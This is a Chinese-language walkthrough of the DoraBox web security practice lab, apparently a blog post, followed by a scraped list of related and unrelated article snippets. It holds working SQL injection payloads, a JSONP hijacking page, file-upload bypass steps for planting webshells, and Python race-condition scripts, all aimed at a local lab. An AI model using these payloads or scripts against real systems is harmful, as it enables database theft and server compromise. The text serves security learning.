ssion_

DoraBox

SQL注入

SQLi 数字型
SQLi 字符型
SQLi 搜索型

XSS跨站

XSS 反射型
XSS 存储型
XSS DOM型

CSRF

JSONP劫持
CORS跨域资源读

文件包含

任意文件包含
目录限制文件包

文件上传

任意文件上传
JS限制文件上传
MIME限制文件
扩展名限制文件
内容限制文件上传

代码/命令

任意代码执行
任意命令执行

SSRF

SSRF

其他

条件竞争-支付
条件竞争-上传
任意文件读取
XXE

越权

SQL注入

SQLi 数字型

数字型，先输入1，回显正常
1 order by 3查看字段数，得到字段数为3
-1 union select 1,2,3，知道2，3处可以看到回显
爆库名-1 union select 1,2,database()得到数据库名为pentest
爆表

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='pentest'

或

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

爆字段

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='pentest' and table_name='account'

爆数据

-1 union select 1,2,concat_ws(",",id,rest,own) from account

SQLi 字符型

1' or '1'='1回显正常，包裹形式为’ ’
1' order by 3#字段数为3
-1' union select 1,2,3#回显得到2，3
爆数据库名-1' union select 1,2,database()#
爆表名

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

爆字段

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='pentest' and table_name='account'#

爆数据

-1' union select 1,2,concat_ws(",",id,rest,own) from account#

SQLi 搜索型

1' or 1=1#回显正常(因为这次还有%需要闭合，如果用1’ or ‘1’='1后面的等式不成立)
1' order by 3#得字段数为3
-1' union select 1,2,3#得到回显2，3
爆数据库名-1' union select 1,2,database()#
爆表名

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

爆字段

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='pentest' and table_name='account'#

爆数据

-1' union select 1,2,concat_ws(",",id,rest,own) from account#

XSS跨站

反射型和存储型是服务端的安全漏洞，DOM型是前端JavaScript自身的安全漏洞。存储型存储在服务器数据库，反射型是URL，DOM型是前端存储

XSS 反射型

得到弹窗，并没有存储下来内容

XSS 存储型

先查看源码

输入后，得到

再一次进入这个网站后，会自动跳转到编写的网页
查看源码，已经将所写内容存到数据库了

XSS DOM型

得到弹窗

查看源码

然后。。我迷了

CSRF

CSRF（Cross-siterequestforgery跨站请求伪造，也被称为“oneclickattack”或者sessionriding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用。

示例：一个网站用户Bob可能正在浏览聊天论坛，而同时另一个用户Alice也在此论坛中，并且后者刚刚发布了一个具有Bob银行链接的图片消息。设想一下，Alice编写了一个在Bob的银行站点上进行取款的form提交的链接，并将此链接作为图片tag。如果Bob的银行在cookie中保存他的授权信息，并且此cookie没有过期，那么当Bob的浏览器尝试装载图片时将提交这个取款form和他的cookie，这样在没经Bob同意的情况下便授权了这次事务。

JSONP劫持

https://www.cnblogs.com/dowinning/archive/2012/04/19/json-jsonp-jQuery.html

源码中用到了json，可以跨域因此自己写一个html


	include "../class/function.class.php";
	$reqMethod = "GET";
	$reqValue = "callback";
	$p = new Func($reqMethod, $reqValue);
	$info = array('username' => 'Vulkey_Chen', 'mobilephone' => '13188888888', 'email' => '[email protected]', 'address' => '中华人民共和国', 'sex' => 'Cool Man');
	if(!@$_GET['callback']){
		echo $p -> con_function('json_encode',$info);
	}else{
		$callback = htmlspecialchars($_GET['callback']);
		echo "{$callback}(" . $p -> con_function('json_encode',$info) . ")";
	}
?>

可以得到弹窗，得到里面的address

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>JSONP劫持测试</title>
</head>
<body>
<script type="text/javascript">
function test(result)
        {
            alert(result.address);
        }
</script>
<script type="text/javascript" src="http://127.0.0.1/DoraBox-master/csrf/jsonp.php?callback=test"></script>
</body>
</html>

CORS跨域资源读

https://blog.csdn.net/qq_15437667/article/details/78841335


	if (@$_SERVER['HTTP_ORIGIN']){
		header("Access-Control-Allow-Origin: ".$_SERVER['HTTP_ORIGIN']);
	}else{
		header("Access-Control-Allow-Origin: *");
	}
	header("Access-Control-Allow-Headers: X-Requested-With");
	header("Access-Control-Allow-Credentials: true");
	header("Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS");

	$info = array('username' => 'Vulkey_Chen', 'mobilephone' => '13188888888', 'email' => '[email protected]', 'address' => '中华人民共和国', 'sex' => 'Cool Man');
	echo json_encode($info);
?>

这是ajax原理
https://mp.weixin.qq.com/s?src=11×tamp=1584872580&ver=2232&signature=NI1-02jjsNBGQoaLYztsofV7S4UQ31CTCHU4kaLHQPoru5GIAdlttFJL-Cu4WKviTyHiItuZElNW2bOBya0R90EXEPiFwXb2tur2hDMOpltRuSAnsfikciifSEPayj&new=1

使用Ajax发送http请求（get&post请求）https://www.cnblogs.com/qianguyihao/p/8485028.html
https://www.cnblogs.com/ruckly/p/11006744.html

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Ajax</title>
</head>
<body>
<h1>Ajax 发送 get 请求</h1>
<script>
function ajax() {
  //创建xhr对象 
  var xhr = new XMLHttpRequest();
  //设置响应返回的数据格式
  xhr.responseType = "text";
  //创建一个 GET 请求，采用异步
  xhr.open('GET', 'http://127.0.0.1/DoraBox-master/csrf/userinfo.php', true);
  //注册相关事件回调处理函数
  xhr.onreadystatechange= function(e) { 
    if(this.status == 4||this.status == 200){
	//状态等于4时响应完成，但页面404时仍可接收到响应，所以这里要status(页面状态)==200，既页面正常才给接收响应
        //document.write(this.responseText);
		alert(this.responseText);
    }
  };
  xhr.send();
}
ajax();
</script>
</body>
</html>

文件包含

任意文件包含

可以直接读取

用…/666.txt去读取

目录限制文件包

<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>DoraBox - PATH_INCLUDE</title>
</head>
<body>
<?php
	include "../class/function.class.php";
	$p = new Func("GET","file");
	$p -> con_html();
	if (isset($_REQUEST['submit'])) {
		$file = $_REQUEST['file'];
		include './'.$file;
	}
?>
</body>
</html>

查看源码多了一个./加上后可以读取，但是我不加也可以读取，不是很懂。

文件上传

任意文件上传

随便上传什么文件都可以

JS限制文件上传

发现不能上传php文件

先将扩展名改为可提交的类型，然后抓包，上传成功

并且成功连接到菜刀

或者将javascript.enabled关闭，禁用JavaScript（~~但是不知道为什么，我关闭后还是不行~~ ）

MIME限制文件

上传文件，发现文件类型不对

抓包，查看源码，发现其改为以下几种类型即可绕过

修改类型

文件上传成功

扩展名限制文件

查看源码，发现不允许上传php文件

可以通过抓包该扩展名，改为php3，非合法扩展名后加合法扩展名，或者是用\0(其为16进制中的0x00)截断

上传成功

内容限制文件上传

可通过合成图片马等饶过

这样也行（~~但是我没成功，可能那儿没弄好~~ ）

代码/命令

任意代码执行

得到报错

assert(表达式)：判断一个表达式是否成立。如果表达式的值为假，整个程序将退出，并输出一条错误信息。如果表达式的值为真则继续执行后面的语句。
当参数为字符串时，会被当作php代码执行。

因此phpinfo()得到执行，拿到webshell

任意命令执行

echo "1234",可以连接菜刀

SSRF

http://www.baidu.com得到显示了该网页

http://127.0.0.1/DoraBox-master可以查看本地文件，和文件包含相似

其他

条件竞争
https://blog.csdn.net/ivalue/article/details/81412494

条件竞争-支付

源码是当给出的钱不大于拥有的钱时，都是可以支付的，只要连续进行交易，就可以在钱还没有更新的时候给出

 
include('../conn.php');
$db = new mysqli(DB_HOST, DB_USER, DB_PASS, DB_NAME);
$sql = "SELECT rest FROM account";
$rest = intval($db->query($sql)->fetch_assoc()['rest']);
$sql = "SELECT own FROM account";
$own = intval($db->query($sql)->fetch_assoc()['own']);
echo "

    余额：{$rest}元
    

    支付元给林晨去买辣条

    

    林晨现在手里有{$own}元

";
if ($_POST){
    $money = intval($_POST['money']);
    if($money <= $rest) {
        $sql = "UPDATE account SET rest=rest-".$money;
        $db->query($sql);
        $sql = "UPDATE account SET own=own+".$money;
        $db->query($sql);
        echo "";
    } else {
        echo "支付失败，可能是因为您的余额不足。";
    }
}
?>

~~因为poc里有一个脚本，可以直接运行，但是我的python跑不了，刚开始是没有requests这个库，下了库之后，python都打不开了~~

import requests
import threading
import Queue

url = "http://127.0.0.1/DoraBox-master/race_condition/pay.php"
threads = 25
q = Queue.Queue()

for i in range(50):
    q.put(i)

def post():
    while not q.empty():
        q.get()
        r = requests.post(url, data={'money': 1})
        print(r.text)

if __name__ == '__main__':
    for i in range(threads):
        t = threading.Thread(target=post)
        t.start()

    for i in range(threads):
        t.join()

条件竞争-上传

源码里有一个白名单，上传后，如果不在白名单里，文件就会被删除


show_source(__FILE__);
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./uploads/";
$filename = $_FILES['myfile']['name'];

if (is_uploaded_file($_FILES['myfile']['tmp_name'])){
    if (!move_uploaded_file($_FILES['myfile']['tmp_name'],$path.$filename)){
        die("error:can not move!");
    }   
} else {
    die("error:not an upload file！");
}

$newfile = $path.$filename;
echo "file upload success.file path is: ".$newfile."\n
";

if ($_FILES['myfile']['error'] > 0){
    unlink($newfile);
    die("Upload file error: ");
}

$ext = array_pop(explode(".",$_FILES['myfile']['name']));
if (!in_array($ext,$allowtype)){
    unlink($newfile);
    die("error:upload the file type is not allowed，delete the file！");
}
?>

我们通过多个文件一同发送，在删除文件之前，得到访问，~~这是poc里的脚本~~

import requests
import threading
import os

class RaceCondition(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)

        self.url = 'http://127.0.0.1/DoraBox-master/race_condition/key.php' #上传的文件地址
        self.uploadUrl = 'http://127.0.0.1/DoraBox-master/race_condition/upload.php' #上传文件的地址

    def _get(self):
        print('try to call uploaded file...')
        r = requests.get(self.url)
        if r.status_code == 200:
            print('[*] create file info.php success.')
            os._exit(0)

    def _upload(self):
        print('upload file...')
        file = {'myfile': open('key.php', 'r')} #本地脚本木马
        requests.post(self.uploadUrl, files=file)

    def run(self):
        while True:
            for i in range(5):
                self._get()

            for i in range(10):
                self._upload()
                self._get()

if __name__ == '__main__':
    threads = 50    

    for i in range(threads):
        t = RaceCondition()
        t.start()

    for i in range(threads):
        t.join()

任意文件读取

我直接去读取上一道题用到的key.php

…/key.php也不行
…/race_condition/key.php进行访问后会显示里面的内容，但并不会执行

XXE

尝试登录时，发现都会登陆成功

这是前端JavaScript的代码

function doLogin(){
	var username = document.getElementById("name").value;
	var password = document.getElementById("pwd").value;

	if(username == "" || password == ""){
		alert("请输入账户/密码！");
		return;
	}
	
	var data = "" + username + "" + password + ""; 
    $.ajax({
        type: "POST",
        url: "login.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        success: alert("登录成功！")
    }); 
}

看了源码，也没看懂


	//code refence:https://github.com/c0ny1/xxe-lab/blob/master/php_xxe/
	header('Content-Type: text/html; charset=utf-8');
	include "../class/function.class.php";
	$account = "admin";
	$pwd = "admin";
	libxml_disable_entity_loader(false);
	$xmlfile = file_get_contents('php://input');
	try{
		$dom = new DOMDocument();
		$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
		$creds = simplexml_import_dom($dom);
		$username = $creds->username;
		$password = $creds->password;
	if($username == $account && $password == $pwd){
		$result = sprintf("%d%s",1,$username);
	}else{
		$result = sprintf("%d%s",0,$username);
	}	
	}catch(Exception $e){
		$result = sprintf("%d%s",3,$e->getMessage());
	}
	echo $result;
?>

libxml_disable_entity_loader()作用是设置是否禁止从外部加载XML实体，设为true就是禁止，目的是防止XML注入攻击。
file_get_contents() 函数把整个文件读入一个字符串中。
simplexml_import_dom() 函数从 DOM 节点返回 SimpleXMLElement 对象。

因为前端写的数据类型就是xml，可以进行xml注入攻击，而且是post

XML实体注入漏洞
https://www.cnblogs.com/xiaozi/p/5785165.html

越权

先注册两个用户


水平越权


将其中一个id换成另一个的id，另一个的密码得到改变，去尝试登录，登录成功

垂直越权
将cookie中的id修改为1，登录管理员成功

将普通用户改为管理员，不停修改

你可能感兴趣的:(DoraBox)

dorabox靶场writeup 硬核韦恩靶场实践靶场搭建集成环境配置安全安全漏洞
靶场搭建这里我直接采用Windows下的wamp集成环境，直接将靶场源码下载到本地，解压到网站根目录即可。网站源码下载地址：https://github.com/Acmesec/DoraBox数据库的配置，修改conn.php的数据库连接账号及密码，在本地数据库创建一个pentest数据库，将pentest.sql文件导入到数据库中，在创建的库中执行sourceD:/wamp/www/DoraBo
文件上传漏洞备忘录 Sure_lis 笔记
写在前面这篇文章算是我自己做完upload-labs和DoraBox上传文件靶场的一个总结，方法都是很常见的，也没有什么高难度，所以也算是小白文。如果我写的有错误欢迎指正。JS校验这种是比较好理解也比较好操作的，只需要Burp抓包拦截，然后修改后缀名即可达到绕过的目的。黑白名单黑名单就是不允许的名单，白名单就是只允许的名单。黑名单有以下几种方法绕过：特殊后缀，例如要上传php一句话，已知网站不允许
BWVS-源码泄漏 Session劫持漏洞逻辑错误漏洞 SSRF baynk #BWVS
0x00总结这是BWVS中最后一篇了，内容比较多，有很多和DoraBox很相似，比较推荐刚刚入门的看看关于SQL那几篇-BWVS-SQL注入类型判断-BWVS-SQL联合查询注入-BWVS-SQL报错型注入-BWVS-SQL盲注类型判断最后的一些小项都放在这一篇博客里面了。0x01源码泄漏/bug/Source_code/code1这个其实比较简单，就是做一些信息收集类的东西，打开前端，发现有注释
DoraBox靶场（二）CSRF Sure_lis DoraBox
JSONP劫持JSONP(JSONWithPadding)，是一种特殊的XSRF攻击，目的是获取敏感数据，当JSON数据响应给网站时，浏览器立即会调用数组或者对象的构造函数。正是利用这一点，把构造方法替换成恶意代码，在构造方法中添加将JSON数据发送给第三方即攻击者的代码。打开页面得到json格式这时需要构造劫持页面，用来截获敏感数据。给出作者的POCjson劫持functionvulkey(da
【DoraBox实战】————3、CSRF分析与研究 FLy_鹏程万里【渗透测试实战2】————DoraBox
CSRF简介CSRF的全名为Cross-siterequestforgery，它的中文名为跨站请求伪造。CSRF是一种挟持用户在已经登陆的web应用程序上执行非本意的操作的攻击方式。相比于XSS，CSRF是利用了系统对页面浏览器的信任，XSS则利用了系统对用户的信任。你也可以这样来理解：攻击者盗用了你的身份，以你的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操
【DoraBox实战】————8、SSRF分析与研究 FLy_鹏程万里【渗透测试实战2】————DoraBox
SSRF简介SSRF(Server-SideRequestForgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）SSRF形成原因SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比
DoraBox-sql注入 weixin_43938446 SQL注入学习
SQLi数字型查看有多少列：orderby4之后报错。sql:SELECT*FROMnewsWHEREid=1unionselect1,user(),database()limit1,5爆出库名-在这里我们确定了数据库为pentest,登录用户为root,接着我们去爆表名。sql:SELECT*FROMnewsWHEREid=1unionselect1,2,group_concat(table_n
文件上传-条件竞争-DoraBox 银河以北，吾彦最美文件上传
一、条件竞争的概念发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中二、文件上传-条件竞争源码三、文件上传-条件竞争漏洞使用方法我门可以猜测源码，这里应该是我们成功上传了php文件但后端在短时间内将其删除了，所以我们要抢到在它删除之前访问文件，就如我们打开文件的时候去删除它，会提示文件文件已打开一样，这样从而防止文件被删除。利用木马文件：上传PHP木马文件key.
Spring Boot配置腾讯云SSL证书 zhouzilin_wh linux java
一、申请有权威的SSL证书我是在腾讯云申请的二、jks文件复制到项目的application.properties同级目录三、修改SpringBoot的application.properties#https加密端口号443server.port=443#SSL证书路径一定要加上classpath:server.ssl.key-store=classpath:www.dorabox.club.jk
DoraBox 练习 yqdidy
目录SQL注入数字型字符型搜索型xssCSRFJSONP劫持CORS跨域资源读文件包含文件上传任意文件上传JS限制文件上传MIME限制文件扩展名限制文件内容限制文件上代码/命令任意代码执行任意命令执行SSRFSSRF其他条件竞争支付文件上传任意文件读取SQL注入数字型1查找注入点。因为是数值型，所以就直接用数值型注入办法。2.-1orderby3#查看列数。3.爆数据库名为pentest：-1un
DoraBox ssion_
DoraBoxSQL注入SQLi数字型SQLi字符型SQLi搜索型XSS跨站XSS反射型XSS存储型XSSDOM型CSRFJSONP劫持CORS跨域资源读文件包含任意文件包含目录限制文件包文件上传任意文件上传JS限制文件上传MIME限制文件扩展名限制文件内容限制文件上传代码/命令任意代码执行任意命令执行SSRFSSRF其他条件竞争-支付条件竞争-上传任意文件读取XXE越权SQL注入SQLi数字型数
DoraBox 漏洞练习平台 weixin_30477797
项目地址：https://github.com/gh0stkey/DoraBoxSQL注入SQLi数字型判断表中有多少列http://127.0.0.1/DoraBox/sql_injection/sql_num.php?id=1%20order%20by%201&submit=submit依次增大orderby后面的值，直到报错，报错的前一个数为字段数可以确定union注入的字段为3，此时我们构
搭建学习环境(六)——DoraBox baynk 靶场练习 #DoraBox
0x01前言BWVS实在玩的不过瘾，每天就搞一关熟悉代码审计吧。DoraBox似乎在github上的链接已经打不开了，是一个朋友发给我的，反正不想学习就来搞下靶场，准备把常见的靶场都玩一遍。下载地址：百度云盘0x02安装使用之前已经搭过很多环境了，所以一些底层的东西我这就不写了。直接将包放到网站根目录。看这情况有个pentest.sql，应该是要导入数据库文件信息了，首先进入数据库创建数据库。[r
DoraBox-master——SQL注入练习 sevenlob 笔记
DoraBox-master环境搭建今天开始做DoraBox-master的SQL注入练习。DoraBox-master的搭建和通关都要比sqlimaster简单一点。给一份官方下载地址DraBox在GitHub下载先改好coon.php文件，一般来说红框框里都改成root在使用PHPstudy搭建的环境之下，在命令行中进行操作。先把数据库文件打开，每个人安装的位置不一样，但大致是cd每个地方下面
哆啦盒（DoraBox）靶场通过教程安徽锋刃科技安全
Sql注入直接开始第一关，sql注入数字型源码中id是htmlspecialchars过滤的，过滤是过滤单引号，双引号，尖括号和&的，但是过滤的是html实体并不会影响我们的操作-1unionselect1,2,3爆数据库：-1unionselect1,user(),database()爆表：-1UNIONSELECT1,2,group_concat(table_name)frominformat
零基础成为黑客 tim5wang 网络安全
笔者刚乱入了CTF，算是入门了，此处分享一下入门经验一个漏洞练习平台：https://github.com/gh0stkey/DoraBox使用教程参考：https://www.cnblogs.com/zhaijiahui/p/10789251.html攻防世界：https://adworld.xctf.org.cn/task这个网站很良心，第一次点开这个网站，仿佛看到了新世界的大门正在向我缓缓打
DoraBox qq_45835337
sql注入1数字型判断列数，为3列判断回显个数判断库名查列名查数据2字符型判断回显查库查表查列查数据3搜索型观察特点，在前方用%’，后方用#最后得数据xss1XSS反射型就直接在,alert("hhh")就是用脚本让网页执行自己代码2XSS存储型直接输入脚本，但第一次，需要刷新下之后会随着你输入的内容，储存量变大，显示的此界面越多3XSSDOM型和反射型有点类似，但相关的需要查阅，然后innerH
【DoraBox实战】————9、任意文件读取 FLy_鹏程万里【渗透测试实战2】————DoraBox
任意文件读取在web安全中，任意文件读取漏洞是非常常见的一种漏洞，属于文件操作类漏洞，一般常见于PHP/java/python语言中，任意文件读取漏洞，顾名思义，就是可以任意读取服务器上部分或者全部文件的漏洞，攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config。漏洞一般存在于文件下载参数，文件包含参数。主要是由于程序对传入的文件名或者文件路径
[黑洞与暗粒子]没有光的世界 comsci
无论是相对论还是其它现代物理学,都显然有个缺陷,那就是必须有光才能够计算但是,我相信,在我们的世界和宇宙平面中,肯定存在没有光的世界.... 那么,在没有光的世界,光子和其它粒子的规律无法被应用和考察,那么以光速为核心的 &nbs
jQuery Lazy Load 图片延迟加载 aijuans jquery
基于 jQuery 的图片延迟加载插件，在用户滚动页面到图片之后才进行加载。对于有较多的图片的网页，使用图片延迟加载，能有效的提高页面加载速度。版本： jQuery v1.4.4+ jQuery Lazy Load v1.7.2 注意事项：需要真正实现图片延迟加载，必须将真实图片地址写在 data-original 属性中。若 src
使用Jodd的优点 Kai_Ge jodd
1. 简化和统一 controller ，抛弃 extends SimpleFormController ，统一使用 implements Controller 的方式。 2. 简化 JSP 页面的 bind, 不需要一个字段一个字段的绑定。 3. 对 bean 没有任何要求，可以使用任意的 bean 做为 formBean。使用方法简介
jpa Query转hibernate Query 120153216 Hibernate
public List<Map> getMapList(String hql, Map map) { org.hibernate.Query jpaQuery = entityManager.createQuery(hql); if (null != map) { for (String parameter : map.keySet()) { jp
Django_Python3添加MySQL/MariaDB支持 2002wmj mariaDB
现状首先，[email protected] 中默认的引擎为 django.db.backends.mysql 。但是在Python3中如果这样写的话，会发现 django.db.backends.mysql 依赖 MySQLdb[5] ，而 MySQLdb 又不兼容 Python3 于是要找一种新的方式来继续使用MySQL。 MySQL官方的方案首先据MySQL文档[3]说，自从MySQL
在SQLSERVER中查找消耗IO最多的SQL 357029540 SQL Server
返回做IO数目最多的50条语句以及它们的执行计划。 select top 50 (total_logical_reads/execution_count) as avg_logical_reads, (total_logical_writes/execution_count) as avg_logical_writes, (tot
spring UnChecked 异常官方定义！ 7454103 spring
如果你接触过spring的事物管理！那么你必须明白 spring的非捕获异常！即 unchecked 异常！因为 spring 默认这类异常事物自动回滚！！ public static boolean isCheckedException(Throwable ex) { return !(ex instanceof RuntimeExcep
mongoDB 入门指南、示例 adminjun java mongodb 操作
一、准备工作 1、下载mongoDB 下载地址：http://www.mongodb.org/downloads 选择合适你的版本相关文档：http://www.mongodb.org/display/DOCS/Tutorial 2、安装mongoDB A、不解压模式：将下载下来的mongoDB-xxx.zip打开，找到bin目录，运行mongod.exe就可以启动服务，默
CUDA 5 Release Candidate Now Available aijuans CUDA
The CUDA 5 Release Candidate is now available at http://developer.nvidia.com/<wbr></wbr>cuda/cuda-pre-production. Now applicable to a broader set of algorithms, CUDA 5 has advanced fe
Essential Studio for WinRT网格控件测评 Axiba JavaScript html5
Essential Studio for WinRT界面控件包含了商业平板应用程序开发中所需的所有控件，如市场上运行速度最快的grid 和chart、地图、RDL报表查看器、丰富的文本查看器及图表等等。同时，该控件还包含了一组独特的库，用于从WinRT应用程序中生成Excel、Word以及PDF格式的文件。此文将对其另外一个强大的控件——网格控件进行专门的测评详述。网格控件功能 1、
java 获取windows系统安装的证书或证书链 bewithme windows
有时需要获取windows系统安装的证书或证书链，比如说你要通过证书来创建java的密钥库。有关证书链的解释可以查看此处。 public static void main(String[] args) { SunMSCAPI providerMSCAPI = new SunMSCAPI(); S
NoSQL数据库之Redis数据库管理(set类型和zset类型) bijian1013 redis 数据库 NoSQL
4.sets类型 Set是集合，它是string类型的无序集合。set是通过hash table实现的，添加、删除和查找的复杂度都是O(1)。对集合我们可以取并集、交集、差集。通过这些操作我们可以实现sns中的好友推荐和blog的tag功能。 sadd：向名称为key的set中添加元
异常捕获何时用Exception，何时用Throwable bingyingao
用Exception的情况 try { //可能发生空指针、数组溢出等异常 } catch (Exception e) {
【Kafka四】Kakfa伪分布式安装 bit1129 kafka
在http://bit1129.iteye.com/blog/2174791一文中，实现了单Kafka服务器的安装，在Kafka中，每个Kafka服务器称为一个broker。本文简单介绍下，在单机环境下Kafka的伪分布式安装和测试验证 1. 安装步骤 Kafka伪分布式安装的思路跟Zookeeper的伪分布式安装思路完全一样，不过比Zookeeper稍微简单些(不
Project Euler bookjovi haskell
Project Euler是个数学问题求解网站，网站设计的很有意思，有很多problem，在未提交正确答案前不能查看problem的overview，也不能查看关于problem的discussion thread，只能看到现在problem已经被多少人解决了，人数越多往往代表问题越容易。看看problem 1吧： Add all the natural num
Java-Collections Framework学习与总结-ArrayDeque BrokenDreams Collections
表、栈和队列是三种基本的数据结构，前面总结的ArrayList和LinkedList可以作为任意一种数据结构来使用，当然由于实现方式的不同，操作的效率也会不同。这篇要看一下java.util.ArrayDeque。从命名上看
读《研磨设计模式》-代码笔记-装饰模式-Decorator bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ import java.io.BufferedOutputStream; import java.io.DataOutputStream; import java.io.FileOutputStream; import java.io.Fi
Maven学习(一) chenyu19891124 Maven私服
学习一门技术和工具总得花费一段时间，5月底6月初自己学习了一些工具，maven+Hudson+nexus的搭建，对于maven以前只是听说，顺便再自己的电脑上搭建了一个maven环境，但是完全不了解maven这一强大的构建工具，还有ant也是一个构建工具，但ant就没有maven那么的简单方便，其实简单点说maven是一个运用命令行就能完成构建，测试，打包，发布一系列功
[原创]JWFD工作流引擎设计----节点匹配搜索算法(用于初步解决条件异步汇聚问题) 补充 comsci 算法工作 PHP 搜索引擎嵌入式
本文主要介绍在JWFD工作流引擎设计中遇到的一个实际问题的解决方案，请参考我的博文"带条件选择的并行汇聚路由问题"中图例A2描述的情况(http://comsci.iteye.com/blog/339756),我现在把我对图例A2的一个解决方案公布出来，请大家多指点节点匹配搜索算法(用于解决标准对称流程图条件汇聚点运行控制参数的算法) 需要解决的问题：已知分支
Linux中用shell获取昨天、明天或多天前的日期 daizj linux shell 上几年昨天获取上几个月
在Linux中可以通过date命令获取昨天、明天、上个月、下个月、上一年和下一年 # 获取昨天 date -d 'yesterday' # 或 date -d 'last day' # 获取明天 date -d 'tomorrow' # 或 date -d 'next day' # 获取上个月 date -d 'last month' #
我所理解的云计算 dongwei_6688 云计算
在刚开始接触到一个概念时，人们往往都会去探寻这个概念的含义，以达到对其有一个感性的认知，在Wikipedia上关于“云计算”是这么定义的，它说： Cloud computing is a phrase used to describe a variety of computing co
YII CMenu配置 dcj3sjt126com yii
Adding id and class names to CMenu We use the id and htmlOptions to accomplish this. Watch. //in your view $this->widget('zii.widgets.CMenu', array( 'id'=>'myMenu', 'items'=>$this-&g
设计模式之静态代理与动态代理 come_for_dream 设计模式
静态代理与动态代理代理模式是java开发中用到的相对比较多的设计模式，其中的思想就是主业务和相关业务分离。所谓的代理设计就是指由一个代理主题来操作真实主题，真实主题执行具体的业务操作，而代理主题负责其他相关业务的处理。比如我们在进行删除操作的时候需要检验一下用户是否登陆，我们可以删除看成主业务，而把检验用户是否登陆看成其相关业务
【转】理解Javascript 系列 gcc2ge JavaScript
理解Javascript_13_执行模型详解摘要: 在《理解Javascript_12_执行模型浅析》一文中,我们初步的了解了执行上下文与作用域的概念，那么这一篇将深入分析执行上下文的构建过程，了解执行上下文、函数对象、作用域三者之间的关系。函数执行环境简单的代码:当调用say方法时，第一步是创建其执行环境，在创建执行环境的过程中，会按照定义的先后顺序完成一系列操作:1.首先会创建一个
Subsets II hcx2013 set
Given a collection of integers that might contain duplicates, nums, return all possible subsets. Note: Elements in a subset must be in non-descending order. The solution set must not conta
Spring4.1新特性——Spring缓存框架增强 jinnianshilongnian spring4
目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
shell嵌套expect执行命令 liyonghui160com
一直都想把expect的操作写到bash脚本里,这样就不用我再写两个脚本来执行了,搞了一下午终于有点小成就,给大家看看吧. 系统:centos 5.x 1.先安装expect yum -y install expect 2.脚本内容: cat auto_svn.sh #!/bin/bash
Linux实用命令整理 pda158 linux
0. 基本命令　　linux 基本命令整理　　1. 压缩解压　　tar -zcvf a.tar.gz a #把a压缩成a.tar.gz 　　tar -zxvf a.tar.gz #把a.tar.gz解压成a 　　2. vim小结　　2.1 vim替换　　:m,ns/word_1/word_2/gc
独立开发人员通向成功的29个小贴士 shoothao 独立开发
概述：本文收集了关于独立开发人员通向成功需要注意的一些东西,对于具体的每个贴士的注解有兴趣的朋友可以查看下面标注的原文地址。明白你从事独立开发的原因和目的。保持坚持制定计划的好习惯。万事开头难，第一份订单是关键。培养多元化业务技能。提供卓越的服务和品质。谨小慎微。营销是必备技能。学会组织，有条理的工作才是最有效率的。 “独立
JAVA中堆栈和内存分配原理 uule java
1、栈、堆 1.寄存器：最快的存储区, 由编译器根据需求进行分配,我们在程序中无法控制.2. 栈：存放基本类型的变量数据和对象的引用，但对象本身不存放在栈中，而是存放在堆（new 出来的对象）或者常量池中（字符串常量对象存放在常量池中。）3. 堆：存放所有new出来的对象。4. 静态域：存放静态成员（static定义的）5. 常量池：存放字符串常量和基本类型常量（public static f